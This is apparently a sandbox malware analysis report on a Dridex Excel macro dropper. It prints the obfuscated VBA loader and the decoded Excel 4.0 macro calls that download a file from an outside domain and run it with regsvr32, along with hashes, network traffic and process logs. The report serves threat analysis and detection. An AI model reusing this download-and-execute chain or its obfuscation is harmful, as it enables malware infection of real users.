                    SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                    SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                    SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                    Malicious:false
                    C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):241332
                    Entropy (8bit):4.206817415570808
                    Encrypted:false
                    SSDEEP:1536:cG2LEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cTNNSk8DtKBrpb2vxrOpprf/nVq
                    MD5:FDC005848930295BD2BEDC28CDDF4E57
                    SHA1:425ACD9C11F3ADD39533B5859DA2D4FBFC3C66EE
                    SHA-256:14D206152AB901B785CA013A80585FBA93F329324E1304DB04AA380A3C76F1A9
                    SHA-512:C70BA3D8F0643DFC3D514D573A7DA52E96BB3AB1DE4223E3CD51B34DD1B20D0E5CD493EA7710183CED563F821EF92C1CC6C63EF3BD81705D4471E71F62B593E8
                    Malicious:false
                    C:\Users\user\AppData\Local\Temp\TarF70D.tmp
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):152533
                    Entropy (8bit):6.31602258454967
                    Encrypted:false
                    SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                    MD5:D0682A3C344DFC62FB18D5A539F81F61
                    SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                    SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                    SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                    Malicious:false
                    C:\Users\user\Desktop\~$Dridex-06-bc1b.xlsm
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):165
                    Entropy (8bit):1.4377382811115937
                    Encrypted:false
                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                    MD5:797869BB881CFBCDAC2064F92B26E46F
                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                    Malicious:true
                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                    Static File Info

                    General

                    File type:Microsoft Excel 2007+
                    Entropy (8bit):7.6136938439046835
                    TrID:
                    • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                    • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                    • ZIP compressed archive (8000/1) 7.58%
                    File name:Dridex-06-bc1b.xlsm
                    File size:29655
                    MD5:f72f88ebdf048fdfedf0aa3e298d9e71
                    SHA1:b8ea58415338bed65d4cd194ead6ac663ad71a6c
                    SHA256:78ccf25ecee02f759cefa6b1c29a00fb4ce64c000f7b9c04c1fc08e04d04bc1b
                    SHA512:0c6d96fcda11df417cfd48d51753d5a6334d80df04b3709ccbfc8a2d5d073822ad606da49e99c724a9d5bd16a98a623f2f9f3a2cbfe2b01bc668f44991db2903
                    SSDEEP:384:flRwzF2FBLDDBf2kbi+lj4YhX8rRI6vXO9BvGiSmDU+P4QRdUgE5cF9Y3XF:fDAFqP1u6NsrRzXO+iSkU+waSxcF9YnF

                    File Icon

                    Icon Hash:e4e2aa8aa4bcbcac

                    Static OLE Info

                    General

                    Document Type:OpenXML
                    Number of OLE Files:2

                    OLE File "/opt/package/joesandbox/database/analysis/344478/sample/Dridex-06-bc1b.xlsm"

                    Indicators

                    Has Summary Info:False
                    Application Name:unknown
                    Encrypted Document:False
                    Contains Word Document Stream:
                    Contains Workbook/Book Stream:
                    Contains PowerPoint Document Stream:
                    Contains Visio Document Stream:
                    Contains ObjectPool Stream:
                    Flash Objects Count:
                    Contains VBA Macros:True

                    Summary

                    Author:brt
                    Last Saved By:
                    Create Time:2020-11-24T09:53:01Z
                    Last Saved Time:2020-11-24T11:16:24Z
                    Creating Application:Microsoft Excel
                    Security:0

                    Document Summary

                    Thumbnail Scaling Desired:false
                    Company:
                    Contains Dirty Links:false
                    Shared Document:false
                    Changed Hyperlinks:false
                    Application Version:16.0300

                    Streams with VBA

                    VBA File Name: Foglio1.cls, Stream Size: 2640
                    General
                    Stream Path:VBA/Foglio1
                    VBA File Name:Foglio1.cls
                    Stream Size:2640
                    Data ASCII:. . . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . p . . N . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . p a g o U n o , 1 0 , 0 , M S F o r m s , F r a m e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . .

                    VBA Code Keywords

                    Keyword
                    PagamentoDocumento
                    VB_Name
                    VB_Creatable
                    Application.OnTime
                    VB_Exposed
                    Frame"
                    Len(n)
                    VB_Control
                    "TURN()":
                    VB_Customizable
                    "Aut"
                    ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants):
                    "=RE"
                    Replace(E,
                    "pagoUno,
                    "BarUno"
                    Chr(Asc(Mid(n,
                    Split(u,
                    PagamentoDocumento()
                    VB_TemplateDerived
                    MSForms,
                    False
                    excell()
                    excell
                    Attribute
                    Private
                    VB_PredeclaredId
                    VB_GlobalNameSpace
                    pagoUno_Layout()
                    VB_Base
                    VBA Code
                    Attribute VB_Name = "Foglio1"
                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                    Attribute VB_GlobalNameSpace = False
                    Attribute VB_Creatable = False
                    Attribute VB_PredeclaredId = True
                    Attribute VB_Exposed = True
                    Attribute VB_TemplateDerived = False
                    Attribute VB_Customizable = True
                    Attribute VB_Control = "pagoUno, 10, 0, MSForms, Frame"
                    Sub PagamentoDocumento()
                    j = "=RE"
                    m = "TURN()":
                    Sheets(1).Cells(6, 1).value = j & m: mg = "Aut"
                    Sheets(1).Cells(1, 1).Name = mg & "o_io22"
                    c = 3:
                    For Each p In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants): n = n & p: Next
                    For X = c To Len(n) Step c
                    If (X Mod 2) Then k = -1 Else k = 1
                    u = u & Chr(Asc(Mid(n, X, 1)) + k): Next
                    IR = Split(u, "{")
                    For Each E In IR
                    Sheets(1).Cells(1, 1).value = "=" & Replace(E, "[", "J")
                    Run (mg & "o_io22")
                    Next
                    excell
                    End Sub
                    Private Sub excell()
                    Application.OnTime Now, "BarUno"
                    End Sub
                    
                    Private Sub pagoUno_Layout()
                    PagamentoDocumento
                    End Sub
                    VBA File Name: Modulo1.bas, Stream Size: 889
                    General
                    Stream Path:VBA/Modulo1
                    VBA File Name:Modulo1.bas
                    Stream Size:889

                    VBA Code Keywords

                    Keyword
                    Attribute
                    VB_Name
                    BarUno()
                    ActiveWorkbook.Close
                    VBA Code
                    Attribute VB_Name = "Modulo1"
                    Sub BarUno()
                    ActiveWorkbook.Close 0
                    End Sub
                    VBA File Name: Questa_cartella_di_lavoro.cls, Stream Size: 1014
                    General
                    Stream Path:VBA/Questa_cartella_di_lavoro
                    VBA File Name:Questa_cartella_di_lavoro.cls
                    Stream Size:1014

                    VBA Code Keywords

                    Keyword
                    "Questa_cartella_di_lavoro"
                    False
                    VB_Exposed
                    Attribute
                    VB_Name
                    VB_Creatable
                    VB_PredeclaredId
                    VB_GlobalNameSpace
                    VB_Base
                    VB_Customizable
                    VB_TemplateDerived
                    VBA Code
                    Attribute VB_Name = "Questa_cartella_di_lavoro"
                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                    Attribute VB_GlobalNameSpace = False
                    Attribute VB_Creatable = False
                    Attribute VB_PredeclaredId = True
                    Attribute VB_Exposed = True
                    Attribute VB_TemplateDerived = False
                    Attribute VB_Customizable = True

                    Streams

                    Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 564
                    General
                    Stream Path:PROJECT
                    File Type:ASCII text, with CRLF line terminators
                    Stream Size:564
                    Entropy:5.25985243733
                    Base64 Encoded:True
                    Data ASCII:I D = " { 0 5 6 6 E 4 0 1 - 8 0 6 F - 4 7 1 6 - B 6 4 7 - E 0 B 8 5 9 A 4 D 5 7 D } " . . D o c u m e n t = Q u e s t a _ c a r t e l l a _ d i _ l a v o r o / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = F o g l i o 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l o 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 8 D A 6 F 9 5 7 3 9 5 7 3 9 5 7 3 9 5 7 3 " . . D P B = " B 0 B 2 0 7 6 8 0 8 6 8 0
                    Data Raw:49 44 3d 22 7b 30 35 36 36 45 34 30 31 2d 38 30 36 46 2d 34 37 31 36 2d 42 36 34 37 2d 45 30 42 38 35 39 41 34 44 35 37 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 46 6f 67 6c 69 6f 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d
                    Stream Path: PROJECTwm, File Type: data, Stream Size: 128
                    General
                    Stream Path:PROJECTwm
                    File Type:data
                    Stream Size:128
                    Entropy:3.34420769179
                    Base64 Encoded:False
                    Data ASCII:Q u e s t a _ c a r t e l l a _ d i _ l a v o r o . Q . u . e . s . t . a . _ . c . a . r . t . e . l . l . a . _ . d . i . _ . l . a . v . o . r . o . . . F o g l i o 1 . F . o . g . l . i . o . 1 . . . M o d u l o 1 . M . o . d . u . l . o . 1 . . . . .
                    Data Raw:51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 00 51 00 75 00 65 00 73 00 74 00 61 00 5f 00 63 00 61 00 72 00 74 00 65 00 6c 00 6c 00 61 00 5f 00 64 00 69 00 5f 00 6c 00 61 00 76 00 6f 00 72 00 6f 00 00 00 46 6f 67 6c 69 6f 31 00 46 00 6f 00 67 00 6c 00 69 00 6f 00 31 00 00 00 4d 6f 64 75 6c 6f 31 00 4d 00 6f 00 64 00 75 00 6c 00 6f 00 31 00 00 00 00 00
                    Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3535
                    General
                    Stream Path:VBA/_VBA_PROJECT
                    File Type:data
                    Stream Size:3535
                    Entropy:4.33045908783
                    Base64 Encoded:False
                    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                    Data Raw:cc 61 b2 00 00 03 00 ff 10 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                    Stream Path: VBA/dir, File Type: data, Stream Size: 847
                    General
                    Stream Path:VBA/dir
                    File Type:data
                    Stream Size:847
                    Entropy:6.50704839241
                    Base64 Encoded:True
                    Data ASCII:. K . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . H . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                    Data Raw:01 4b b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 48 c3 aa 61 01 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                    Macro 4.0 Code

                    CALL("Sh"&U&"ll32", "Sh"&U&"llEx"&U&"cut"&U&"A", "JJCCCCJ", y, "Op"&U&"n", "r"&U&"gsvr32", " -"&if&" "&B&D&F, y, y)
                    
                    "=CALL(""Sh""&U&""ll32"",""Sh""&U&""llEx""&U&""cut""&U&""A"", ""JJCCCCJ"",y,""Op""&U&""n"",""r""&U&""gsvr32"","" -""&if&"" ""&B&D&F,y,y)"=RETURN()

                    OLE File "/opt/package/joesandbox/database/analysis/344478/sample/Dridex-06-bc1b.xlsm"

                    Indicators

                    Has Summary Info:False
                    Application Name:unknown
                    Encrypted Document:False
                    Contains Word Document Stream:
                    Contains Workbook/Book Stream:
                    Contains PowerPoint Document Stream:
                    Contains Visio Document Stream:
                    Contains ObjectPool Stream:
                    Flash Objects Count:
                    Contains VBA Macros:False

                    Summary

                    Author:brt
                    Last Saved By:
                    Create Time:2020-11-24T09:53:01Z
                    Last Saved Time:2020-11-24T11:16:24Z
                    Creating Application:Microsoft Excel
                    Security:0

                    Document Summary

                    Thumbnail Scaling Desired:false
                    Company:
                    Contains Dirty Links:false
                    Shared Document:false
                    Changed Hyperlinks:false
                    Application Version:16.0300

                    Streams

                    Stream Path: \x1CompObj, File Type: data, Stream Size: 112
                    General
                    Stream Path:\x1CompObj
                    File Type:data
                    Stream Size:112
                    Entropy:4.6011544911
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . . . . . . n ` . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 F r a m e . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F r a m e . 1 . . 9 . q . . . . . . . . . . . .
                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 20 18 6e 60 f4 ce 11 9b cd 00 aa 00 60 8e 01 1a 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 72 61 6d 65 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0e 00 00 00 46 6f 72 6d 73 2e 46 72 61 6d 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                    Stream Path: f, File Type: data, Stream Size: 54
                    General
                    Stream Path:f
                    File Type:data
                    Stream Size:54
                    Entropy:1.81172045559
                    Base64 Encoded:False
                    Data ASCII:. . ( . . . . . . . . . . . . . . . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:00 04 28 00 06 0c 06 08 0e 00 00 80 0e 00 00 80 03 00 00 00 0e 00 00 80 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Stream Path: o, File Type: empty, Stream Size: 0
                    General
                    Stream Path:o
                    File Type:empty
                    Stream Size:0
                    Entropy:0.0
                    Base64 Encoded:False
                    Data ASCII:
                    Data Raw:

                    Macro 4.0 Code

                    CALL("Sh"&U&"ll32", "Sh"&U&"llEx"&U&"cut"&U&"A", "JJCCCCJ", y, "Op"&U&"n", "r"&U&"gsvr32", " -"&if&" "&B&D&F, y, y)
                    
                    "=CALL(""Sh""&U&""ll32"",""Sh""&U&""llEx""&U&""cut""&U&""A"", ""JJCCCCJ"",y,""Op""&U&""n"",""r""&U&""gsvr32"","" -""&if&"" ""&B&D&F,y,y)"=RETURN()

                    Network Behavior

                    Network Port Distribution

                    TCP Packets


                    UDP Packets


                    DNS Queries

                    Timestamp:Jan 26, 2021 16:16:52.568312883 CET
                    Source IP:192.168.2.22
                    Dest IP:8.8.8.8
                    Trans ID:0xccae
                    OP Code:Standard query (0)
                    Name:compagniamaestro.com
                    Type:A (IP address)
                    Class:IN (0x0001)

                    DNS Answers

                    Timestamp:Jan 26, 2021 16:16:52.629705906 CET
                    Source IP:8.8.8.8
                    Dest IP:192.168.2.22
                    Trans ID:0xccae
                    Reply Code:No error (0)
                    Name:compagniamaestro.com
                    CName:
                    Address:199.192.21.36
                    Type:A (IP address)
                    Class:IN (0x0001)

                    HTTPS Packets

                    Timestamp:Jan 26, 2021 16:16:53.438882113 CET
                    Source IP:199.192.21.36
                    Source Port:443
                    Dest IP:192.168.2.22
                    Dest Port:49167
                    JA3 SSL Client Fingerprint:771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0
                    JA3 SSL Client Digest:7dcce5b76c8b17472d024758970a406b
                    Certificate 1
                    Subject:CN=bamoli.de
                    Issuer:CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US
                    Not Before:Sat Nov 28 07:26:47 CET 2020
                    Not After:Fri Feb 26 07:26:47 CET 2021
                    Certificate 2
                    Subject:CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US
                    Issuer:CN=DST Root CA X3, O=Digital Signature Trust Co.
                    Not Before:Thu Mar 17 17:40:46 CET 2016
                    Not After:Wed Mar 17 17:40:46 CET 2021

                    Code Manipulations

                    System Behavior

                    General

                    Start time:16:16:40
                    Start date:26/01/2021
                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                    Imagebase:0x13fcb0000
                    File size:27641504 bytes
                    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:16:16:49
                    Start date:26/01/2021
                    Path:C:\Windows\System32\regsvr32.exe
                    Wow64 process (32bit):false
                    Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\LO400F\PI909U\960.
                    Imagebase:0xffbb0000
                    File size:19456 bytes
                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:16:16:49
                    Start date:26/01/2021
                    Path:C:\Windows\System32\regsvr32.exe
                    Wow64 process (32bit):false
                    Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\SD120E\EP146E\960.
                    Imagebase:0xffbb0000
                    File size:19456 bytes
                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:16:16:50
                    Start date:26/01/2021
                    Path:C:\Windows\System32\regsvr32.exe
                    Wow64 process (32bit):false
                    Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\QP101F\TL941X\960.
                    Imagebase:0xffbb0000
                    File size:19456 bytes
                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Disassembly

                    Code Analysis

                    Call Graph

                    Graph (image not reproduced; legend: Entrypoint, Decryption Function, Executed, Not Executed)
                    Nodes: PagamentoDocumento (Asc:1, Replace:1, Len:1, Mid:1, Run:1, Chr:1, Split:1); excell (Now:1); pagoUno_Layout; BarUno (Close:1)
                    Edges: pagoUno_Layout -> PagamentoDocumento; PagamentoDocumento -> excell

                    Module: Foglio1

                    Declaration
                    Content
                    Attribute VB_Name = "Foglio1"
                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                    Attribute VB_GlobalNameSpace = False
                    Attribute VB_Creatable = False
                    Attribute VB_PredeclaredId = True
                    Attribute VB_Exposed = True
                    Attribute VB_TemplateDerived = False
                    Attribute VB_Customizable = True
                    Attribute VB_Control = "pagoUno, 10, 0, MSForms, Frame"

                    Executed Functions
                    APIs / Meta Information

                    Cells

                    Cells

                    SpecialCells

                    xlCellTypeConstants

                    Len

                    Len(n) -> 2841

                    Chr

                    Asc

                    Mid

                    Split

                    Cells

                    Replace

                    Replace("SET.NAME("V","aestro")","[","J") -> SET.NAME("V","aestro")
                    Replace("SET.NAME("m",ACOS(-0.5)*135/PI())","[","J") -> SET.NAME("m",ACOS(-0.5)*135/PI())
                    Replace("SET.NAME("y",COS(RADIANS(60))-COS(60*PI()/180))","[","J") -> SET.NAME("y",COS(RADIANS(60))-COS(60*PI()/180))
                    Replace("SET.NAME("D","\")","[","J") -> SET.NAME("D","\")
                    Replace("SET.NAME("K","w")","[","J") -> SET.NAME("K","w")
                    Replace("SET.NAME("Z","o")","[","J") -> SET.NAME("Z","o")
                    Replace("IF(ISNUMBER(SEARCH(K,GET.WORKSPACE(1))), ,CLOSE(TRUE))","[","J") -> IF(ISNUMBER(SEARCH(K,GET.WORKSPACE(1))), ,CLOSE(TRUE))
                    Replace("SET.NAME("A","C:"&D&CHAR(RANDBETWEEN(65,m))&CHAR(RANDBETWEEN(65,m))&RANDBETWEEN(100,999)&CHAR(RANDBETWEEN(65,m)))","[","J") -> SET.NAME("A","C:"&D&CHAR(RANDBETWEEN(65,m))&CHAR(RANDBETWEEN(65,m))&RANDBETWEEN(100,999)&CHAR(RANDBETWEEN(65,m)))
                    Replace("SET.NAME("if",CHAR(115))","[","J") -> SET.NAME("if",CHAR(115))
                    Replace("SET.NAME("B",A&D&CHAR(RANDBETWEEN(65,m))&CHAR(RANDBETWEEN(65,m))&RANDBETWEEN(100,999)&CHAR(RANDBETWEEN(65,m)))","[","J") -> SET.NAME("B",A&D&CHAR(RANDBETWEEN(65,m))&CHAR(RANDBETWEEN(65,m))&RANDBETWEEN(100,999)&CHAR(RANDBETWEEN(65,m)))
                    Replace("SET.NAME("F",GET.WORKSPACE(13)&".")","[","J") -> SET.NAME("F",GET.WORKSPACE(13)&".")
                    Replace("SET.NAME("U","e")","[","J") -> SET.NAME("U","e")
                    Replace("CALL("K"&U&"rn"&U&"l32","Cr"&U&"at"&U&"Direct"&Z&"ryA","JCJ",A,y)","[","J") -> CALL("K"&U&"rn"&U&"l32","Cr"&U&"at"&U&"Direct"&Z&"ryA","JCJ",A,y)
                    Replace("SET.NAME("G",SET.NAME("h","mpagniam"))","[","J") -> SET.NAME("G",SET.NAME("h","mpagniam"))
                    Replace("CALL("Kern"&U&"l32","CreateDir"&U&"ct"&Z&"ryA","[C[",B,y)","[","J") -> CALL("Kern"&U&"l32","CreateDir"&U&"ct"&Z&"ryA","JCJ",B,y)
                    Replace("CALL("URLMON","URLD"&Z&"wnl"&Z&"adT"&Z&"FileA", "[[CC[[",y,REPLACE("hqps:"&GET.WORKSPACE(9)&GET.WORKSPACE(9)&"co"&h&V&RIGHT(F)&"c"&Z&"m",2,1,"tt"),B&D&F,y,y)","[","J") -> CALL("URLMON","URLD"&Z&"wnl"&Z&"adT"&Z&"FileA", "JJCCJJ",y,REPLACE("hqps:"&GET.WORKSPACE(9)&GET.WORKSPACE(9)&"co"&h&V&RIGHT(F)&"c"&Z&"m",2,1,"tt"),B&D&F,y,y)
                    Replace("CALL("Sh"&U&"ll32","Sh"&U&"llEx"&U&"cut"&U&"A", "[[CCCC[",y,"Op"&U&"n","r"&U&"gsvr32"," -"&if&" "&B&D&F,y,y)","[","J") -> CALL("Sh"&U&"ll32","Sh"&U&"llEx"&U&"cut"&U&"A", "JJCCCCJ",y,"Op"&U&"n","r"&U&"gsvr32"," -"&if&" "&B&D&F,y,y)

                    Run

                    Run("Auto_io22")
                    Run("Auto_io22")

                    Part of subcall function excell@Foglio1: OnTime

                    Part of subcall function excell@Foglio1: Now

                    Strings / Decrypted Strings
                    "=RE"
                    "TURN()"
                    "Aut"
                    "{"
                    "="
                    "J"
                    "["
                    "="
                    "J"
                    "["
                    Instruction / Meta Information
                    Sub PagamentoDocumento()
                        j = "=RE"                                    ' executed
                        m = "TURN()"
                        Sheets(1).Cells(6, 1).value = j & m          ' API: Cells
                        mg = "Aut"
                        Sheets(1).Cells(1, 1).Name = mg & "o_io22"   ' API: Cells
                        c = 3
                        For Each p In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)   ' API: SpecialCells, xlCellTypeConstants
                            n = n & p
                        Next                                         ' API: SpecialCells, xlCellTypeConstants
                        For X = c To Len(n) Step c                   ' Len(n) -> 2841; executed
                            If (X Mod 2) Then
                                k = -1
                            Else
                                k = 1
                            End If
                            u = u & Chr(Asc(Mid(n, X, 1)) + k)       ' API: Chr, Asc, Mid
                        Next                                         ' Len(n) -> 2841; executed
                        IR = Split(u, "{")                           ' API: Split
                        For Each E In IR
                            Sheets(1).Cells(1, 1).value = "=" & Replace(E, "[", "J")   ' API: Cells; Replace("SET.NAME("V","aestro")","[","J") -> SET.NAME("V","aestro"); executed
                            Run (mg & "o_io22")                      ' Run("Auto_io22"); executed
                        Next
                        excell
                    End Sub

                    APIs | Meta Information

                    Part of subcall function PagamentoDocumento@Foglio1: Cells

                    Part of subcall function PagamentoDocumento@Foglio1: Cells

                    Part of subcall function PagamentoDocumento@Foglio1: SpecialCells

                    Part of subcall function PagamentoDocumento@Foglio1: xlCellTypeConstants

                    Part of subcall function PagamentoDocumento@Foglio1: Len

                    Part of subcall function PagamentoDocumento@Foglio1: Chr

                    Part of subcall function PagamentoDocumento@Foglio1: Asc

                    Part of subcall function PagamentoDocumento@Foglio1: Mid

                    Part of subcall function PagamentoDocumento@Foglio1: Split

                    Part of subcall function PagamentoDocumento@Foglio1: Cells

                    Part of subcall function PagamentoDocumento@Foglio1: Replace

                    Part of subcall function PagamentoDocumento@Foglio1: Run

                    Line | Instruction | Meta Information
                    31

                    Private Sub pagoUno_Layout()

                    32

                    PagamentoDocumento

                    executed
                    33

                    End Sub

                    APIs | Meta Information

                    OnTime

                    Now

                    Strings | Decrypted Strings
                    "BarUno"
                    Line | Instruction | Meta Information
                    27

                    Private Sub excell()

                    28

                    Application.OnTime Now, "BarUno"

                    OnTime

                    Now

                    executed
                    29

                    End Sub

                    Module: Modulo1

                    Declaration
                    Line | Content
                    1

                    Attribute VB_Name = "Modulo1"

                    Executed Functions
                    APIs | Meta Information

                    Close

                    Line | Instruction | Meta Information
                    2

                    Sub BarUno()

                    3

                    ActiveWorkbook.Close 0

                    Close

                    executed
                    4

                    End Sub

                    Module: Questa_cartella_di_lavoro

                    Declaration
                    Line | Content
                    1

                    Attribute VB_Name = "Questa_cartella_di_lavoro"

                    2

                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                    3

                    Attribute VB_GlobalNameSpace = False

                    4

                    Attribute VB_Creatable = False

                    5

                    Attribute VB_PredeclaredId = True

                    6

                    Attribute VB_Exposed = True

                    7

                    Attribute VB_TemplateDerived = False

                    8

                    Attribute VB_Customizable = True
